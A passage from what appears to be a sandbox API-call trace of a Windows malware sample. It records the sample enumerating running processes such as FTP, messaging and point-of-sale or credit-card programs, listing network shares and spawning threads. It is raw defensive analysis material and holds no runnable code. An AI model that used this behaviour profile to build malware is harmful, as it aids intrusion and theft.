(lpString="leechftp.exe") returned 12 [0186.809] Process32NextW (in: hSnapshot=0x2d4, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0186.810] lstrlenW (lpString="ncftp.exe") returned 9 [0186.810] Process32NextW (in: hSnapshot=0x2d4, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0186.811] lstrlenW (lpString="notepad.exe") returned 11 [0186.811] Process32NextW (in: hSnapshot=0x2d4, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0186.812] lstrlenW (lpString="operamail.exe") returned 13 [0186.812] Process32NextW (in: hSnapshot=0x2d4, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0186.813] lstrlenW (lpString="pidgin.exe") returned 10 [0186.814] Process32NextW (in: hSnapshot=0x2d4, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0186.815] lstrlenW (lpString="scriptftp.exe") returned 13 [0186.815] Process32NextW (in: hSnapshot=0x2d4, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0186.816] lstrlenW (lpString="skype.exe") returned 9 [0186.816] Process32NextW (in: hSnapshot=0x2d4, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0186.817] lstrlenW (lpString="smartftp.exe") returned 12 [0186.817] Process32NextW (in: hSnapshot=0x2d4, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0186.818] lstrlenW (lpString="thunderbird.exe") returned 15 [0186.818] Process32NextW (in: hSnapshot=0x2d4, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="totalcmd.exe")) returned 1 [0186.819] lstrlenW (lpString="totalcmd.exe") returned 12 [0186.820] Process32NextW (in: hSnapshot=0x2d4, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0186.821] lstrlenW (lpString="trillian.exe") returned 12 [0186.821] Process32NextW (in: hSnapshot=0x2d4, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0186.822] lstrlenW (lpString="webdrive.exe") returned 12 [0186.822] Process32NextW (in: hSnapshot=0x2d4, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xff8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0186.823] lstrlenW (lpString="whatsapp.exe") returned 12 [0186.823] Process32NextW (in: hSnapshot=0x2d4, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0186.824] lstrlenW (lpString="winscp.exe") returned 10 [0186.825] Process32NextW (in: hSnapshot=0x2d4, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd08, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0186.825] lstrlenW (lpString="yahoomessenger.exe") returned 18 [0186.826] Process32NextW (in: hSnapshot=0x2d4, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0186.827] lstrlenW (lpString="active-charge.exe") returned 17 [0186.827] Process32NextW (in: hSnapshot=0x2d4, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xde0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0186.828] lstrlenW (lpString="accupos.exe") returned 11 [0186.828] Process32NextW (in: hSnapshot=0x2d4, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0186.829] lstrlenW (lpString="afr38.exe") returned 9 [0186.829] Process32NextW (in: hSnapshot=0x2d4, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0186.830] lstrlenW (lpString="aldelo.exe") returned 10 [0186.830] Process32NextW (in: hSnapshot=0x2d4, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0186.831] lstrlenW (lpString="ccv_server.exe") returned 14 [0186.831] Process32NextW (in: hSnapshot=0x2d4, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xba0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0186.832] lstrlenW (lpString="centralcreditcard.exe") returned 21 [0186.832] Process32NextW (in: hSnapshot=0x2d4, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xee8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0186.833] lstrlenW (lpString="creditservice.exe") returned 17 [0186.834] Process32NextW (in: hSnapshot=0x2d4, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0186.834] lstrlenW (lpString="edcsvr.exe") returned 10 [0186.835] Process32NextW (in: hSnapshot=0x2d4, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0186.836] lstrlenW (lpString="fpos.exe") returned 8 [0186.836] Process32NextW (in: hSnapshot=0x2d4, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0186.837] lstrlenW (lpString="isspos.exe") returned 10 [0186.837] Process32NextW (in: hSnapshot=0x2d4, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0186.838] lstrlenW (lpString="mxslipstream.exe") returned 16 [0186.838] Process32NextW (in: hSnapshot=0x2d4, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1010, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0186.839] lstrlenW (lpString="omnipos.exe") returned 11 [0186.839] Process32NextW (in: hSnapshot=0x2d4, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1024, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0186.840] lstrlenW (lpString="spcwin.exe") returned 10 [0186.840] Process32NextW (in: hSnapshot=0x2d4, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0186.841] lstrlenW (lpString="spgagentservice.exe") returned 19 [0186.841] Process32NextW (in: hSnapshot=0x2d4, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0186.842] lstrlenW (lpString="utg2.exe") returned 8 [0186.842] Process32NextW (in: hSnapshot=0x2d4, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1060, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_community.exe")) returned 1 [0186.843] lstrlenW (lpString="lb_community.exe") returned 16 [0186.843] Process32NextW (in: hSnapshot=0x2d4, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1074, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="miniature.exe")) returned 1 [0186.844] lstrlenW (lpString="miniature.exe") returned 13 [0186.844] Process32NextW (in: hSnapshot=0x2d4, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="humanity-volumes-enables.exe")) returned 1 [0186.845] lstrlenW (lpString="humanity-volumes-enables.exe") returned 28 [0186.845] Process32NextW (in: hSnapshot=0x2d4, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="operation-environments.exe")) returned 1 [0186.846] lstrlenW (lpString="operation-environments.exe") returned 26 [0186.846] Process32NextW (in: hSnapshot=0x2d4, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0186.847] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0186.847] Process32NextW (in: hSnapshot=0x2d4, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0186.848] lstrlenW (lpString="taskhostw.exe") returned 13 [0186.848] Process32NextW (in: hSnapshot=0x2d4, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x12a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="UNPCampaignManager.exe")) returned 1 [0186.849] lstrlenW (lpString="UNPCampaignManager.exe") returned 22 [0186.849] Process32NextW (in: hSnapshot=0x2d4, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x12b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0186.850] lstrlenW (lpString="DeviceCensus.exe") returned 16 [0186.850] Process32NextW (in: hSnapshot=0x2d4, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x12b0, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0186.851] lstrlenW (lpString="conhost.exe") returned 11 [0186.880] Process32NextW (in: hSnapshot=0x2d4, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x348, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0186.881] lstrlenW (lpString="sppsvc.exe") returned 10 [0186.881] Process32NextW (in: hSnapshot=0x2d4, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0186.882] lstrlenW (lpString="dllhost.exe") returned 11 [0186.883] Process32NextW (in: hSnapshot=0x2d4, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="wdgmug.exe")) returned 1 [0186.884] lstrlenW (lpString="wdgmug.exe") returned 10 [0186.884] Process32NextW (in: hSnapshot=0x2d4, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1160, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x1260, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0186.885] lstrlenW (lpString="cmd.exe") returned 7 [0186.885] Process32NextW (in: hSnapshot=0x2d4, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1160, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0186.886] lstrlenW (lpString="conhost.exe") returned 11 [0186.886] Process32NextW (in: hSnapshot=0x2d4, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x764, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="sc.exe")) returned 1 [0186.887] lstrlenW (lpString="sc.exe") returned 6 [0186.887] Process32NextW (in: hSnapshot=0x2d4, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x764, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0186.887] lstrlenW (lpString="conhost.exe") returned 11 [0186.888] Process32NextW (in: hSnapshot=0x2d4, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0186.888] lstrlenW (lpString="WMIADAP.exe") returned 11 [0186.888] Process32NextW (in: hSnapshot=0x2d4, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x220, pcPriClassBase=13, dwFlags=0x0, szExeFile="LogonUI.exe")) returned 1 [0186.889] lstrlenW (lpString="LogonUI.exe") returned 11 [0186.889] Process32NextW (in: hSnapshot=0x2d4, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x1160, pcPriClassBase=8, dwFlags=0x0, szExeFile="mode.com")) returned 1 [0186.890] lstrlenW (lpString="mode.com") returned 8 [0186.890] Process32NextW (in: hSnapshot=0x2d4, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x1160, pcPriClassBase=8, dwFlags=0x0, szExeFile="mode.com")) returned 0 [0186.891] CloseHandle (hObject=0x2d4) returned 1 [0186.891] Sleep (dwMilliseconds=0x1f4) Thread: id = 5 os_tid = 0x1378 [0159.912] WaitForSingleObject (hHandle=0x19fddc, dwMilliseconds=0xffffffff) returned 0xffffffff [0159.912] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x755198 | out: hHeap=0x710000) returned 1 Thread: id = 6 os_tid = 0x131c [0159.914] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x10) returned 0x76abb8 [0159.914] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x76abb8, Size=0x20) returned 0x74e8e0 [0159.914] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x74e8e0, Size=0x40) returned 0x72a738 [0159.914] GetLogicalDrives () returned 0x4 [0159.914] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xfffe) returned 0x78af78 [0159.915] GetComputerNameW (in: lpBuffer=0x78af7c, nSize=0x272ff64 | out: lpBuffer="NQDPDE", nSize=0x272ff64) returned 1 [0159.915] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x1000) returned 0x76b8f0 [0159.915] WNetOpenEnumW (in: dwScope=0x3, dwType=0x1, dwUsage=0x0, lpNetResource=0x0, lphEnum=0x272ff34 | out: lphEnum=0x272ff34*=0x7253f0) returned 0x0 [0159.978] WNetEnumResourceW (in: hEnum=0x7253f0, lpcCount=0x272ff30, lpBuffer=0x76b8f0, lpBufferSize=0x272ff38 | out: lpcCount=0x272ff30, lpBuffer=0x76b8f0, lpBufferSize=0x272ff38) returned 0x103 [0159.980] WNetCloseEnum (hEnum=0x7253f0) returned 0x0 [0159.980] WNetOpenEnumW (in: dwScope=0x2, dwType=0x1, dwUsage=0x0, lpNetResource=0x0, lphEnum=0x272ff34 | out: lphEnum=0x272ff34*=0x8023d8) returned 0x0 [0167.322] WNetEnumResourceW (in: hEnum=0x8023d8, lpcCount=0x272ff30, lpBuffer=0x76b8f0, lpBufferSize=0x272ff38 | out: lpcCount=0x272ff30, lpBuffer=0x76b8f0, lpBufferSize=0x272ff38) returned 0x0 [0167.322] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x1000) returned 0x3229290 [0167.322] WNetOpenEnumW (in: dwScope=0x2, dwType=0x1, dwUsage=0x0, lpNetResource=0x76b8f0, lphEnum=0x272ff08 | out: lphEnum=0x272ff08*=0x7251b0) returned 0x0 [0167.326] WNetEnumResourceW (in: hEnum=0x7251b0, lpcCount=0x272ff04, lpBuffer=0x3229290, lpBufferSize=0x272ff0c | out: lpcCount=0x272ff04, lpBuffer=0x3229290, lpBufferSize=0x272ff0c) returned 0x103 [0167.326] WNetCloseEnum (hEnum=0x7251b0) returned 0x0 [0167.326] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x1000) returned 0x322a298 [0167.326] WNetOpenEnumW (dwScope=0x2, dwType=0x1, dwUsage=0x0, lpNetResource=0x76b910, lphEnum=0x272ff08) Thread: id = 7 os_tid = 0x1374 [0159.915] GetTickCount () returned 0x1168c2a [0159.916] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x24) returned 0x726138 [0159.916] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x408d90, lpParameter=0x726138, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x278 [0159.916] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x408d90, lpParameter=0x726138, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x27c [0159.917] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x408d90, lpParameter=0x726138, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x280 [0159.918] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x408d90, lpParameter=0x726138, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x284 [0159.918] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x10) returned 0x76ac00 [0159.918] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x76ac00, Size=0x20) returned 0x74e8e0 [0159.918] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x10) returned 0x76abd0 [0159.918] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x76abd0, Size=0x20) returned 0x74e908 [0159.919] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x772d0000 [0159.919] GetProcAddress (hModule=0x772d0000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x772e6b30 [0159.919] Wow64DisableWow64FsRedirection (in: OldValue=0x286ff7c | out: OldValue=0x286ff7c*=0x0) returned 1 [0159.919] lstrlenW (lpString="kernel32.dll") returned 12 [0159.919] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x74e8e0 | out: hHeap=0x710000) returned 1 [0159.919] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0159.919] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x74e908 | out: hHeap=0x710000) returned 1 [0159.919] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4091a0, lpParameter=0x757700, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x288 [0159.920] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0160.214] GetTickCount () returned 0x1168d53 [0160.214] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0160.396] GetTickCount () returned 0x1168e0f [0160.396] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0160.572] GetTickCount () returned 0x1168eba [0160.572] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0160.782] GetTickCount () returned 0x1168f86 [0160.782] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0164.283] GetTickCount () returned 0x1169d32 [0164.284] GetTickCount () returned 0x1169d32 [0164.284] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0164.684] GetTickCount () returned 0x1169ec8 [0164.684] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0164.864] GetTickCount () returned 0x1169f74 [0164.864] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0166.881] GetTickCount () returned 0x116a753 [0166.881] GetTickCount () returned 0x116a753 [0166.881] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0167.251] GetTickCount () returned 0x116a8ca [0167.251] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0167.654] GetTickCount () returned 0x116aa61 [0167.654] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0168.857] GetTickCount () returned 0x116af14 [0168.857] GetTickCount () returned 0x116af14 [0168.857] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0169.159] GetTickCount () returned 0x116b03d [0169.159] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0169.745] GetTickCount () returned 0x116b28e [0169.745] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0170.247] GetTickCount () returned 0x116b482 [0170.247] GetTickCount () returned 0x116b482 [0170.247] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0170.988] GetTickCount () returned 0x116b761 [0170.988] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0171.131] GetTickCount () returned 0x116b7ed [0171.131] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0171.363] GetTickCount () returned 0x116b8d8 [0171.363] GetTickCount () returned 0x116b8d8 [0171.363] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0171.701] GetTickCount () returned 0x116ba2f [0171.701] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0172.732] GetTickCount () returned 0x116be37 [0172.732] GetTickCount () returned 0x116be37 [0172.732] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0173.085] GetTickCount () returned 0x116bf8e [0173.085] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0173.335] GetTickCount () returned 0x116c088 [0173.335] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0173.596] GetTickCount () returned 0x116c192 [0173.596] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0173.702] GetTickCount () returned 0x116c1ff [0173.702] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0173.834] GetTickCount () returned 0x116c27c [0173.834] GetTickCount () returned 0x116c27c [0173.834] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0174.396] GetTickCount () returned 0x116c4af [0174.396] WaitForSingleObject (hHandle=0x288, 